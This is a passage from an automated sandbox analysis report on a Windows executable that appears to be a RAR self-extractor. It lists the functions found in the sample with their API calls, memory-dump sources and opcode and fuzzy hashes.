                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 1ab28f87484d10cca7e11f919868c4ec5bbda490ae7c43b17f2e4e5d932f72e3
                                                            • Instruction ID: 31c360122ec6c5b994ff7cc8e9ba2c873c46cbead8db728f7bf9e8b834281b00
                                                            • Opcode Fuzzy Hash: 1ab28f87484d10cca7e11f919868c4ec5bbda490ae7c43b17f2e4e5d932f72e3
                                                            • Instruction Fuzzy Hash: A04108B1508345AFC710DF65D8849ABBBF9FF98314F10892EF69AD2210E734E649CB52
                                                            Function 001E2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001E2536
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 884c46740007d86e9a980f0f3268372e6674e771f70e53044d4a63842a21b999
                                                            • Instruction ID: d9a0b9b080dd4fc3835fe436b9610828d880ec379f6ff076542dc53e80860d3e
                                                            • Opcode Fuzzy Hash: 884c46740007d86e9a980f0f3268372e6674e771f70e53044d4a63842a21b999
                                                            • Instruction Fuzzy Hash: DFF12770604BC19BDB25DB2688A5BFE77DD6FA4300F08056DFD869B283CB748945C7A2
                                                            Function 001F9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 926083f140f7cdf3d5cb2a5fb3cbd8a3cb581222fd254f7cc4608f58fe40f716
                                                            • Instruction ID: a85f423ba8eb9fec634e62a2a412a23f3fd5e87075611b4178fca8ea0b80e401
                                                            • Opcode Fuzzy Hash: 926083f140f7cdf3d5cb2a5fb3cbd8a3cb581222fd254f7cc4608f58fe40f716
                                                            • Instruction Fuzzy Hash: 08513A66B4036B95DB30BAA59C2177673E4DFA1750F79042BFFC18B1C1FB658C818261
                                                            Function 0020F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0020FE02,00000000,00000000,00000000,00000000,00000000,0020529F), ref: 0020F6CF
                                                            • __fassign.LIBCMT ref: 0020F74A
                                                            • __fassign.LIBCMT ref: 0020F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0020F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0020FE02,00000000,?,?,?,?,?,?,?,?,?,0020FE02,00000000), ref: 0020F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0020FE02,00000000,?,?,?,?,?,?,?,?,?,0020FE02,00000000), ref: 0020F7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 01c1d4bf5f968e07b0c6c741dc1d5e6420281cbeacd1a0403fd660305ac2a102
                                                            • Instruction ID: a8c27066170015594143405495d20a72e7726d638f75b364912f8d91659f15a6
                                                            • Opcode Fuzzy Hash: 01c1d4bf5f968e07b0c6c741dc1d5e6420281cbeacd1a0403fd660305ac2a102
                                                            • Instruction Fuzzy Hash: A75195B1E103099FCB60CFA4DD45AEEFBF8EF09310F14816AE955E7292D670A951CB60
                                                            Function 001FCE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 001FCE9D
                                                              • Part of subcall function 001EB690: _wcslen.LIBCMT ref: 001EB696
                                                            • _swprintf.LIBCMT ref: 001FCED1
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0022946A), ref: 001FCEF1
                                                            • _wcschr.LIBVCRUNTIME ref: 001FCF22
                                                            • EndDialog.USER32(?,00000001), ref: 001FCFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 689974011-1360425832
                                                            • Opcode ID: 78360b20a9eebdd0171869eb2ba53c61abdabf2785190d4b391c2875fbd80051
                                                            • Instruction ID: 4068a9e6ff7b8950017466166e80027cfaf5be389bbf66310ed5ea3c4c854b31
                                                            • Opcode Fuzzy Hash: 78360b20a9eebdd0171869eb2ba53c61abdabf2785190d4b391c2875fbd80051
                                                            • Instruction Fuzzy Hash: E1416FB190025DAADF25DB90EC45AFE77BDAB15300F4080A6BA09E7041EF709A85DFA1
                                                            Function 00202900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00202937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0020293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 002029C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 002029F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00202A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: af8919353c5c24741ce7b4571b42a1f4844b9bf59b1be413431fd2b0f4826a75
                                                            • Instruction ID: dc5c1609e6f1bc79e45ff2deae306dc7db3f2853323ed0f041b96362a8309683
                                                            • Opcode Fuzzy Hash: af8919353c5c24741ce7b4571b42a1f4844b9bf59b1be413431fd2b0f4826a75
                                                            • Instruction Fuzzy Hash: 4941A534A20319EFCF10DF68C889A9EBBB5EF45314F248056E8156B2D3D7719A69CF90
                                                            Function 001F9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 001F9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 001F9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 001F9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 001F9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 001F9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 6478c6723ef64f981a09587e59ede55241424932eeda355ca8bd2f77501e3bc5
                                                            • Instruction ID: ab2188b81cc0cb882dc836aaaa93e0f228eb2ba9dd12faf1a22471884574d16f
                                                            • Opcode Fuzzy Hash: 6478c6723ef64f981a09587e59ede55241424932eeda355ca8bd2f77501e3bc5
                                                            • Instruction Fuzzy Hash: 9041AD76004318AFCB21AF64AC4CB6B7FA8EF49701F008559FA4E9A056CB34E915CF61
                                                            Function 001F9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 2ca7d9cffb32c2515cdac34b7afa8ff9a15b42c5a0c12ab7d3c0f3e3a4a54afd
                                                            • Instruction ID: a000f5b619edc039b754e5332629af8e6af6392fdb980df1ad5c0e2ca800f24b
                                                            • Opcode Fuzzy Hash: 2ca7d9cffb32c2515cdac34b7afa8ff9a15b42c5a0c12ab7d3c0f3e3a4a54afd
                                                            • Instruction Fuzzy Hash: 49319D3264434956DB34FB549C42B7B73E8FB90320F50441FF686472C1FBA1ADA183A1
                                                            Function 0020C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0020C868: _free.LIBCMT ref: 0020C891
                                                            • _free.LIBCMT ref: 0020C8F2
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020C8FD
                                                            • _free.LIBCMT ref: 0020C908
                                                            • _free.LIBCMT ref: 0020C95C
                                                            • _free.LIBCMT ref: 0020C967
                                                            • _free.LIBCMT ref: 0020C972
                                                            • _free.LIBCMT ref: 0020C97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 7709388df891818f14b6d40cdcadf0b567cdfe6748675a398f094dd61d4f746b
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: D6110DB15A0B05AAE721BBB1CC07FCB7BAC9F04B00F508E15B3DD660D3DA65A5258B54
                                                            Function 001FE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,001FE669,001FE5CC,001FE86D), ref: 001FE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001FE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001FE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: b4b9a8166fa54d70acc30bed94fa349fbf3e60d70305286cf00dc5b0dddf39d2
                                                            • Instruction ID: 78d3bb704b73d84cc62b7c2aaf53a4254c04d4a39d743218ac712765c55d43f2
                                                            • Opcode Fuzzy Hash: b4b9a8166fa54d70acc30bed94fa349fbf3e60d70305286cf00dc5b0dddf39d2
                                                            • Instruction Fuzzy Hash: 9DF0F67179072E9B0F218F64ACC85B633CA6A7A771B01447ADB05D7130EF14CCA05B91
                                                            Function 00208900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0020891E
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 00208930
                                                            • _free.LIBCMT ref: 00208943
                                                            • _free.LIBCMT ref: 00208954
                                                            • _free.LIBCMT ref: 00208965
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: p!
                                                            • API String ID: 776569668-1659649850
                                                            • Opcode ID: 2dc5bfc3a827ca074eb5379dacd3499afa1528493db06dbcccab573190543361
                                                            • Instruction ID: 0d91e11bf2e3399a776de3cde85d30f655d98b17fc28459f942885b1cf7168eb
                                                            • Opcode Fuzzy Hash: 2dc5bfc3a827ca074eb5379dacd3499afa1528493db06dbcccab573190543361
                                                            • Instruction Fuzzy Hash: F6F03A79830227CBCB06AF26FC0A4463FA5F7367203820706FA58522F2CF7149659F81
                                                            Function 001F146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F14C2
                                                              • Part of subcall function 001EB146: GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001F1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001F1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 2e1b7b41a4b1785eba9300fcc9d9011d5a4ae29e452520a7e67b0adcc43b6b72
                                                            • Instruction ID: 76eb683ba273c9f0379bbbfc449c7223681a391609d1f04c38db3695b0ed41d9
                                                            • Opcode Fuzzy Hash: 2e1b7b41a4b1785eba9300fcc9d9011d5a4ae29e452520a7e67b0adcc43b6b72
                                                            • Instruction Fuzzy Hash: 5D31E875108345ABC704DFA8D88499BBBF8BF98754F008A1EF999D3210E730D549CBA6
                                                            Function 00202AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00202AF1,002002FC,001FFA34), ref: 00202B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00202B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00202B2F
                                                            • SetLastError.KERNEL32(00000000,00202AF1,002002FC,001FFA34), ref: 00202B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 282675ad84da3b18e7dab343574345409043762ca4704bf9e18f0fd6abb7ef30
                                                            • Instruction ID: 9761af949dc26a3abf4d06ba72697e28bf6a869f296c39347c90bd7f5c17409e
                                                            • Opcode Fuzzy Hash: 282675ad84da3b18e7dab343574345409043762ca4704bf9e18f0fd6abb7ef30
                                                            • Instruction Fuzzy Hash: E601F532138312ADEB152E747C8DB5A3B49FB217B8720433BF510500E3EE224C259500
                                                            Function 002097E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                            • _free.LIBCMT ref: 0020981C
                                                            • _free.LIBCMT ref: 00209844
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 00209851
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                            • _abort.LIBCMT ref: 00209863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 23eb4fdd91a3f5aea604bd39d9a943c04263355ef25687ce3e9234a990dc816e
                                                            • Instruction ID: f7385d134629e8c30f638f8850875a69a63324e8c35f313ccb9bbd300bbd2916
                                                            • Opcode Fuzzy Hash: 23eb4fdd91a3f5aea604bd39d9a943c04263355ef25687ce3e9234a990dc816e
                                                            • Instruction Fuzzy Hash: 1AF02D3517070267C7127734BC0DA5B1A6A8FE2770F218234FA5A923D3EE3088724915
                                                            Function 001FDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001FDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FDC72
                                                            • TranslateMessage.USER32(?), ref: 001FDC7C
                                                            • DispatchMessageW.USER32(?), ref: 001FDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001FDC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
